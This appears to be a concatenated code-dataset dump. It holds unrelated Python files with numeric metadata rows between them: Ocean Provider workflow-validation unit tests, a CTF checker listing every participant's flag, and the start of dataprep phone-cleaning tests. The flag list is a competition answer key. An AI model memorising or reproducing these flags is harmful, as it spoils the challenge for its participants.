        # Resolve a DID to the matching in-memory asset; None if unknown.
        return {dataset.did: dataset, algo.did: algo}.get(args[1])

    def record_consume(*args, **kwargs):
        # Simulate the algorithm asset blowing up when its consumption is recorded.
        if args[0] == dataset.did:
            return dataset
        if args[0] == algo.did:
            raise Exception("I know Python!")

    with patch(
        "ocean_provider.validation.algo.get_asset_from_metadatastore",
        side_effect=fetch_asset,
    ), patch(
        "ocean_provider.validation.algo.record_consume_request",
        side_effect=record_consume,
    ):
        validator = WorkflowValidator(web3, consumer_address, provider_wallet, payload)
        assert validator.validate() is False
        assert (
            validator.error
            == "Algorithm is already in use or can not be found on chain."
        )
@pytest.mark.unit
@patch("ocean_provider.validation.algo.check_asset_consumable", return_value=(True, ""))
@patch(
    "ocean_provider.validation.algo.validate_order",
    return_value=(None, None, provider_fees_event),
)
@patch(
    "ocean_provider.validation.algo.get_service_files_list",
    return_value=[{"url": "dummy"}],
)
def test_fail_wrong_algo_type(provider_wallet, consumer_address, web3):
    """The main dataset's service must be of compute type, not access."""
    dataset = Asset(ddo_dict)
    algo = Asset(alg_ddo_dict)
    algo_service = get_first_service_by_type(algo, ServiceType.ACCESS)
    compute_service = get_first_service_by_type(dataset, ServiceType.COMPUTE)
    payload = {
        "dataset": {
            "documentId": dataset.did,
            "transferTxId": "tx_id",
            "serviceId": compute_service.id,
        },
        "algorithm": {
            "serviceId": algo_service.id,
            "documentId": algo.did,
            "transferTxId": "alg_tx_id",
        },
    }

    def fetch_asset(*args, **kwargs):
        # Resolve a DID to the matching in-memory asset; None if unknown.
        return {dataset.did: dataset, algo.did: algo}.get(args[1])

    def access_service_stub(*args, **kwargs):
        # Force every service lookup to yield an access (non-compute) service.
        return Service(
            index=0,
            service_id=payload["algorithm"]["serviceId"],
            service_type="access",
            datatoken_address="0xa",
            service_endpoint="test",
            encrypted_files="",
            timeout=3600,
        )

    with patch(
        "ocean_provider.validation.algo.get_asset_from_metadatastore",
        side_effect=fetch_asset,
    ), patch(
        "ocean_provider.utils.asset.Asset.get_service_by_id",
        side_effect=access_service_stub,
    ):
        validator = WorkflowValidator(web3, consumer_address, provider_wallet, payload)
        assert validator.validate() is False
        assert validator.error == "Service for main asset must be compute."
@pytest.mark.unit
@patch("ocean_provider.validation.algo.check_asset_consumable", return_value=(True, ""))
@patch(
    "ocean_provider.validation.algo.validate_order",
    return_value=(None, None, provider_fees_event),
)
@patch(
    "ocean_provider.validation.algo.get_service_files_list",
    return_value=[{"url": "dummy"}],
)
def test_fail_allow_raw_false(provider_wallet, consumer_address, web3):
    """Raw-code algorithms are rejected when the compute service forbids them."""
    dataset = Asset(ddo_dict)
    algo = Asset(alg_ddo_dict)
    algo_service = get_first_service_by_type(algo, ServiceType.ACCESS)
    compute_service = get_first_service_by_type(dataset, ServiceType.COMPUTE)
    # Explicitly forbid raw algorithms on the dataset's first service.
    dataset.services[0].compute_dict["allowRawAlgorithm"] = False
    payload = {
        "dataset": {
            "documentId": dataset.did,
            "transferTxId": "tx_id",
            "serviceId": compute_service.id,
        },
        "algorithm": {
            "serviceId": algo_service.id,
            "meta": {
                "rawcode": "console.log('Hello world'!)",
                "format": "docker-image",
                "version": "0.1",
                "container": {"entrypoint": "node $ALGO", "image": "node", "tag": "10"},
            },
        },
    }

    def fetch_asset(*args, **kwargs):
        # Resolve a DID to the matching in-memory asset; None if unknown.
        return {dataset.did: dataset, algo.did: algo}.get(args[1])

    with patch(
        "ocean_provider.validation.algo.get_asset_from_metadatastore",
        side_effect=fetch_asset,
    ):
        validator = WorkflowValidator(web3, consumer_address, provider_wallet, payload)
        assert validator.validate() is False
        assert validator.error == f"cannot run raw algorithm on this did {dataset.did}."
@pytest.mark.unit
@patch("ocean_provider.validation.algo.check_asset_consumable", return_value=(True, ""))
@patch(
    "ocean_provider.validation.algo.validate_order",
    return_value=(None, None, provider_fees_event),
)
def test_success_multiple_services_types(provider_wallet, consumer_address, web3):
    """Happy path mixing a compute dataset with an extra access-type input."""
    dataset = Asset(ddo_dict)
    algo = Asset(alg_ddo_dict)
    algo_service = get_first_service_by_type(algo, ServiceType.ACCESS)
    compute_service = get_first_service_by_type(dataset, ServiceType.COMPUTE)
    payload = {
        "dataset": {
            "documentId": dataset.did,
            "transferTxId": "tx_id",
            "serviceId": compute_service.id,
        },
        "algorithm": {
            "serviceId": algo_service.id,
            "meta": {
                "rawcode": "console.log('Hello world'!)",
                "format": "docker-image",
                "version": "0.1",
                "container": {"entrypoint": "node $ALGO", "image": "node", "tag": "10"},
            },
        },
        "additionalDatasets": [
            {"documentId": dataset.did, "transferTxId": "ddo.did", "serviceId": "access_1"}
        ],
        "environment": "ocean-compute",
    }

    def fetch_asset(*args, **kwargs):
        # Resolve a DID to the matching in-memory asset; None if unknown.
        return {dataset.did: dataset, algo.did: algo}.get(args[1])

    def files_for_service(*args, **kwargs):
        # Access services expose no compute files; compute services do.
        return None if args[0].type == "access" else [{"url": "dummy"}]

    with patch(
        "ocean_provider.validation.algo.get_asset_from_metadatastore",
        side_effect=fetch_asset,
    ), patch(
        "ocean_provider.validation.algo.get_service_files_list",
        side_effect=files_for_service,
    ):
        validator = WorkflowValidator(web3, consumer_address, provider_wallet, payload)
        assert validator.validate() is True
@pytest.mark.unit
@patch("ocean_provider.validation.algo.check_asset_consumable", return_value=(True, ""))
@patch(
    "ocean_provider.validation.algo.validate_order",
    return_value=(None, None, provider_fees_event),
)
def test_fail_missing_algo_meta_documentId(provider_wallet, consumer_address, web3):
    """The algorithm input must carry at least one of meta or documentId."""
    dataset = Asset(ddo_dict)
    algo = Asset(alg_ddo_dict)
    compute_service = get_first_service_by_type(dataset, ServiceType.COMPUTE)
    payload = {
        "dataset": {
            "documentId": dataset.did,
            "transferTxId": "tx_id",
            "serviceId": compute_service.id,
        },
        "algorithm": {"serviceId": None, "meta": None},
        "additionalDatasets": [
            {"documentId": dataset.did, "transferTxId": "ddo.did", "serviceId": "access_1"}
        ],
    }

    def fetch_asset(*args, **kwargs):
        # Resolve a DID to the matching in-memory asset; None if unknown.
        return {dataset.did: dataset, algo.did: algo}.get(args[1])

    def files_for_service(*args, **kwargs):
        # Access services expose no compute files; compute services do.
        return None if args[0].type == "access" else [{"url": "dummy"}]

    with patch(
        "ocean_provider.validation.algo.get_asset_from_metadatastore",
        side_effect=fetch_asset,
    ), patch(
        "ocean_provider.validation.algo.get_service_files_list",
        side_effect=files_for_service,
    ):
        validator = WorkflowValidator(web3, consumer_address, provider_wallet, payload)
        assert validator.validate() is False
        assert (
            validator.error
            == "both meta and documentId are missing from algorithm input, at least one of these is required."
        )
@pytest.mark.unit
@patch("ocean_provider.validation.algo.check_asset_consumable", return_value=(True, ""))
@patch(
    "ocean_provider.validation.algo.validate_order",
    return_value=(None, None, provider_fees_event),
)
@patch(
    "ocean_provider.validation.algo.get_service_files_list",
    return_value=[{"url": "dummy"}],
)
def test_fee_amount_not_paid(provider_wallet, consumer_address, web3):
    """Validation fails when the required provider fee exceeds what was paid.

    Note: the previous docstring claimed this was the "happy flow", but the
    test asserts that validation FAILS when get_provider_fee_amount demands
    a fee (1 token, 10**18 wei) the order has not covered.
    """
    web3 = get_web3()
    ddo = Asset(ddo_dict)
    alg_ddo = Asset(alg_ddo_dict)
    sa_compute = get_first_service_by_type(alg_ddo, ServiceType.ACCESS)
    sa = get_first_service_by_type(ddo, ServiceType.COMPUTE)
    data = {
        "dataset": {"documentId": ddo.did, "serviceId": sa.id, "transferTxId": "tx_id"},
        "algorithm": {
            "documentId": alg_ddo.did,
            "serviceId": sa_compute.id,
            "transferTxId": "alg_tx_id",
        },
    }

    def side_effect(*args, **kwargs):
        # Resolve a DID to the matching in-memory asset; None if unknown.
        if ddo.did == args[1]:
            return ddo
        if alg_ddo.did == args[1]:
            return alg_ddo

    with patch(
        "ocean_provider.validation.algo.get_asset_from_metadatastore",
        side_effect=side_effect,
    ):
        with patch("ocean_provider.validation.algo.get_provider_fee_amount") as mock:
            # Demand a non-zero fee so the (unpaid) order fails fee validation.
            mock.return_value = 10**18
            validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
            assert validator.validate() is False
            assert (
                validator.error
                == "Provider fees must be paid on the asset, OR on the algorithm ordered, OR on any additional input."
            )
| 34.594709
| 118
| 0.630888
| 3,715
| 32,692
| 5.29179
| 0.060296
| 0.027774
| 0.072333
| 0.105753
| 0.882802
| 0.866779
| 0.862048
| 0.858792
| 0.854621
| 0.852637
| 0
| 0.005598
| 0.245993
| 32,692
| 944
| 119
| 34.631356
| 0.791927
| 0.020311
| 0
| 0.771463
| 0
| 0.002418
| 0.280362
| 0.134636
| 0
| 0
| 0.000345
| 0
| 0.053204
| 1
| 0.041112
| false
| 0.002418
| 0.012092
| 0.002418
| 0.091898
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
03b80b5f262e99217c84a1f78d4deff1ac59d1e4
| 8,874
|
py
|
Python
|
tasks-deploy/code-lock/check.py
|
irdkwmnsb/lkshl-ctf
|
e5c0200ddc8ba73df5f321b87b9763fb1bbaba57
|
[
"MIT"
] | 3
|
2021-03-30T06:27:58.000Z
|
2021-04-03T17:56:35.000Z
|
tasks-deploy/code-lock/check.py
|
irdkwmnsb/lkshl-ctf
|
e5c0200ddc8ba73df5f321b87b9763fb1bbaba57
|
[
"MIT"
] | null | null | null |
tasks-deploy/code-lock/check.py
|
irdkwmnsb/lkshl-ctf
|
e5c0200ddc8ba73df5f321b87b9763fb1bbaba57
|
[
"MIT"
] | null | null | null |
def check(attempt, context):
    """Grade a submitted answer against the participant's assigned flag.

    Each participant is deterministically assigned one flag by id modulo the
    flag-pool size. Submitting another participant's flag is flagged as
    plagiarism, carrying the index of the flag's rightful owner.
    """
    assigned = flags[attempt.participant.id % len(flags)]
    if attempt.answer == assigned:
        return Checked(True)
    if attempt.answer in flags:
        # Valid flag, wrong participant: report where it came from.
        return CheckedPlagiarist(False, flags.index(attempt.answer))
    return Checked(False)
flags = ['LKL{MD5_0F_TRRU3_1N_C0OK1E5_E7FkLrE0Hd}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_nWv4lIWP4Z}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_GN8k5zwNBi}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_f3gu4NSaf3}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_suc1j6UtyC}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_Km1EOUc1E5}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_EuVhBIF3LR}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_GTkQ3xAz9O}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_q6kkfGiX6N}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_75t4ylEKKJ}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_uqsjHid20w}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_Ks7fPBannN}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_W53PnTKahg}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_Qs1OcHbxDj}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_Qy8WIzfqzV}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_9eVjSYlOGy}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_WvOhSwt2H8}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_gAteo8iho9}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_Wb12MmWqnI}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_4uVBL9rBZc}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_MZzhm1AvtE}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_byhJhHRz6b}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_bxPKCCgML9}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_8Kj8Gh7iko}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_3XN4PuoTw1}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_2FZo4copO6}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_APphEyjnx7}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_xX1BWKC0jI}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_iKGIiXfwJ2}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_pxg2uUD9xc}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_Nu6bWBjqVh}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_t9h9vIynx9}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_BsEHiUlXeo}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_wsK3hALpvV}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_HCBiep8Pcg}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_O9kQaF92uV}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_WZgOZLmRF6}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_8P98KNJBbL}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_wQdycTf0Hx}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_2KSSI7gfuW}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_lRqYklSjnC}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_rkcRNEc1IO}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_TMRMPQDssA}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_n3GSV9wdHD}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_X4UQiRnm9G}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_9RPAQ2XD3f}', 
'LKL{MD5_0F_TRRU3_1N_C0OK1E5_ewmQcSXzVG}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_pMOjuDj84m}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_owMOMqeNTE}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_dXFa3B8Xa1}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_rFShtsFdcH}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_CuTqeLQotL}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_GkQR1nYLuV}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_AtNOUvvrb9}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_RnIKXvbt6y}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_i4cbvUXuDu}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_jtqkIMG8n3}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_x5rAos2Pt3}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_KJIfXBojYM}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_SI0OY0vBxV}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_xt7yMvW4gA}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_CtCJs0EAD4}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_bY7MDMdxEG}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_F8x7dqWVAC}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_28TlPFGyXN}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_n4yHPIwjFu}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_AHphaJoUoh}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_ud47Z0aIN0}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_0OuaNnfxap}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_MWCZ9ER0fD}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_TAqIJT2xoI}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_2VXhEbvu6y}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_74vceAHswb}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_RdlZ8qNVSy}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_Efg9YtmRwm}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_KAv64LvPlA}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_LgzBLwqusr}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_EATGb7wwV1}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_AJklaM2sj3}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_nR7ppizOmH}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_8rWInA3pLD}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_f5joASdKnq}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_5rfVEA1SKn}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_rO5xSuYdDz}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_kbZPTX9FtK}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_cNmNdJL6eF}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_bKxKWL7PBi}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_0eP2wVMhru}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_tAzfAAiDgm}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_bz8gCn56xA}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_UzLWzbF2Ni}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_D7MFRh0m55}', 
'LKL{MD5_0F_TRRU3_1N_C0OK1E5_xjxxdeIY29}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_5oE2VFOm1k}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_mMMSl2FiqG}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_S58EvFoudu}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_QBlJUPK70l}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_mgXC4cgRuR}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_VuiyLzS1T4}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_HJ5wrhnqgE}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_nCRrvxwJZX}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_V9lt0nh0rM}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_v8J3kfKSG6}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_88BSxBcisc}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_y5zeTOPAoY}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_EmrgxJb4Oe}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_4JfZlC5ECb}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_IxWZ7as1oc}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_bJ35FOR1Ti}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_jXyPhOGl8y}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_7FeQCTrK6H}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_UrBJqGgzXr}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_40nN0hEuH7}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_J7E4c70kZv}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_nax4ozJZal}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_yyYxSaG9Lg}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_65FnwK4S3G}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_ngMiABpWgY}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_QkB7pGdlib}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_hn6JAgkfp9}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_5ttPHhCUeu}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_nQI9DleZwa}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_zXQDrDcXjp}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_rmh6wKqr5W}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_z6T4iezE4L}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_3MTz5wAeW8}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_YLt95J5LYL}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_HRRm2qmYvT}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_0qXTtOotJw}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_Knby2j1Vt7}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_zM6uhXt9mr}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_NTrCKSg295}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_zsPVbOdef6}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_wmvh5yjGsq}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_qI4jbiLSTN}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_6V23wDGw8k}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_ZHl673rVvt}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_xYxPezygYG}', 
'LKL{MD5_0F_TRRU3_1N_C0OK1E5_u90OwejT10}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_dwYt0qUQbu}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_YSSbrhI4cJ}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_tMJi82eO94}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_DOoClZiTMu}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_HHUnmXLihJ}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_oXMNDpx4m1}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_ITb216Ivo1}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_8PtVtoTTQ8}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_jY0HPoKARs}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_qrqOy0yJ0t}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_pfaFNIL0ya}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_SyUNwciL9P}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_ikxL5q2Kue}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_Vl4aTh0Hq5}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_pkBUX6Gjs9}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_dpRnWdBSkz}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_hI9JbIYFe7}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_lKoCvXpns3}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_Ot1BpLsf6z}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_aUqePplEct}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_K3aeIewOl2}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_16k4UxewCG}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_xuiak6uSXY}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_a4U8B7Rq3I}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_PVRnOMjPdR}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_pTSlORIEJJ}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_n65P8A6oD8}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_cNycxwzwSf}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_E1OKRengPT}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_hlTNfsSVRf}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_x6Yo2kgfrG}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_u9OR9kw1A3}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_pm5n0uLlvn}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_KVLNi6K6Lh}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_niS3X6vskg}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_45wuBsCppI}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_0mkn86uBak}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_rf86w61Rrb}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_CURmEpdXzR}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_3iy7dIcHNc}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_CN3QgPm0AC}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_STousE6WAs}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_fVQDO6Y4Ox}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_X1ShYuFYc2}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_7hZlxuStvo}', 
'LKL{MD5_0F_TRRU3_1N_C0OK1E5_EsLJwfjjgU}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_jUgXCEFx5M}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_Iilmp1gpbq}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_Lbib1dMN30}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_4LZMupzGvl}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_MvTFcaZ9nG}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_QTtK6790A8}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_0cH7DzUtRc}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_9BfKPhJt2W}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_fRsz5DvE7z}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_nVHFv3keM0}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_3ovtZ3Eq7m}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_JYBLE3b2to}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_28YfHsvyXL}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_pG0ysfTe3g}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_XbD1thtjEN}']
| 1,109.25
| 8,608
| 0.854519
| 1,432
| 8,874
| 4.597067
| 0.155726
| 0.182288
| 0.24305
| 0.394957
| 0.668388
| 0.668388
| 0
| 0
| 0
| 0
| 0
| 0.202252
| 0.029412
| 8,874
| 8
| 8,608
| 1,109.25
| 0.562057
| 0
| 0
| 0
| 0
| 0
| 0.879567
| 0.879567
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0
| 0
| 0.571429
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
03e1d5503ba51d581812a10f350a8a86e69fcd07
| 12,968
|
py
|
Python
|
dataprep/tests/clean/test_clean_phone.py
|
Waterpine/dataprep-1
|
4032acb1d1f2c413d4cb000d17e8ffa611315f9f
|
[
"MIT"
] | 1,229
|
2019-12-21T02:58:59.000Z
|
2022-03-30T08:12:33.000Z
|
dataprep/tests/clean/test_clean_phone.py
|
Waterpine/dataprep-1
|
4032acb1d1f2c413d4cb000d17e8ffa611315f9f
|
[
"MIT"
] | 680
|
2019-12-19T06:09:23.000Z
|
2022-03-31T04:15:25.000Z
|
dataprep/tests/clean/test_clean_phone.py
|
Waterpine/dataprep-1
|
4032acb1d1f2c413d4cb000d17e8ffa611315f9f
|
[
"MIT"
] | 170
|
2020-01-08T03:27:26.000Z
|
2022-03-20T20:42:55.000Z
|
"""
module for testing the functions clean_phone() and validate_phone()
"""
import logging
import numpy as np
import pandas as pd
import pytest
from ...clean import clean_phone, validate_phone
LOGGER = logging.getLogger(__name__)
@pytest.fixture(scope="module")  # type: ignore
def df_phone() -> pd.DataFrame:
    """Module-scoped DataFrame of messy phone-number inputs shared by all tests."""
    samples = [
        "555-234-5678",
        "(555) 234-5678",
        "555.234.5678",
        "555/234/5678",
        15551234567,
        "(1) 555-234-5678",
        "+1 (234) 567-8901 x. 1234",
        "2345678901 extension 1234",
        "2345678",
        "800-299-JUNK",
        "1-866-4ZIPCAR",
        "1-800-G-O-T-J-U-N-K",
        "123 ABC COMPANY",
        "+66 91 889 8948",
        "hello",
        np.nan,
        "NULL",
    ]
    return pd.DataFrame({"messy_phone": samples})
def test_clean_default(df_phone: pd.DataFrame) -> None:
    """Default output is NPA-NXX-XXXX with ' ext. ' extensions; junk becomes NaN."""
    df_clean = clean_phone(df_phone, "messy_phone")
    expected = df_phone.copy()
    expected["messy_phone_clean"] = (
        ["555-234-5678"] * 4
        + ["555-123-4567", "555-234-5678"]
        + ["234-567-8901 ext. 1234"] * 2
        + ["234-5678", "800-299-5865", "866-494-7227", "800-468-5865"]
        + [np.nan] * 5
    )
    assert expected.equals(df_clean)
def test_clean_output_format(df_phone: pd.DataFrame) -> None:
